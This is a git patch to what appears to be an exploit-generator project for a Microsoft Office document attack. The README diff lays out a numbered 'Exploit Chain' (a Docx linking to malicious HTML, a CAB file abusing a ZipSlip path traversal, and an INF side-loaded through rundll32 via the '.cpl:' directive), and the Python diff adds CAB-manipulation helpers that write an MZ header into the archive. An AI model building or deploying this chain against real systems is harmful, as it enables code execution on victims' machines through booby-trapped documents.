From 53af9514ef8c5f477b06d5b26104f5d53076269c Mon Sep 17 00:00:00 2001
From: d3adc0de <klez.virus@gmail.com>
Date: Wed, 15 Sep 2021 23:53:37 +0100
Subject: [PATCH] Minor Edit in Cab Parser

---
 README.md     | 18 +++++++++---------
 cab_parser.py | 10 +++++++++-
 2 files changed, 18 insertions(+), 10 deletions(-)

diff --git a/README.md b/README.md
index 1cdc2be..4f16404 100644
--- a/README.md
+++ b/README.md
@@ -14,15 +14,15 @@ So far, the only valuable resources I've seen to create a fully working generato
 
 The above resources outline a lot of the requirements needed to create a full chain. As I do not desire
 
-### Chain
-* Docx opened
-* Relationship stored in document.xml.rels points to malicious html
-* IE preview is launched to open the HTML link
-* JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
-  prefixed with the ".cpl:" directive
-* The cab file is opened, the INF file stored in the %TEMP%\Low directory
-* Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
-* Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32 
+### Exploit Chain
+1. Docx opened
+2. Relationship stored in document.xml.rels points to malicious html
+3. IE preview is launched to open the HTML link
+4. JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
+   prefixed with the ".cpl:" directive
+5. The cab file is opened, the INF file stored in the %TEMP%\Low directory
+6. Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
+7. Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32 
   (if this is a DLL)
 
 ### Overlooked Requirements
diff --git a/cab_parser.py b/cab_parser.py
index 474d83e..e267161 100644
--- a/cab_parser.py
+++ b/cab_parser.py
@@ -200,10 +200,18 @@ def parse(file):
     data = open(file, "rb").read()
     cab = Cab(data=data)
     print(cab.to_string())
+
+
+def change_e_magic(cab: Cab, value: bytes):
+    if not value or not isinstance(value, bytes) or len(value) != 4:
+        return
     new_cab = cab.change_bytes(offset=0x58, size=4, value=b"MZ\x90\x00")
     print(Cab(new_cab).to_string())
+
+
+def save(cab: Cab, file: str):
     with open(file, "wb") as out:
-        out.write(Cab(new_cab).to_bytes())
+        out.write(cab.to_bytes())
 
 
 if __name__ == "__main__":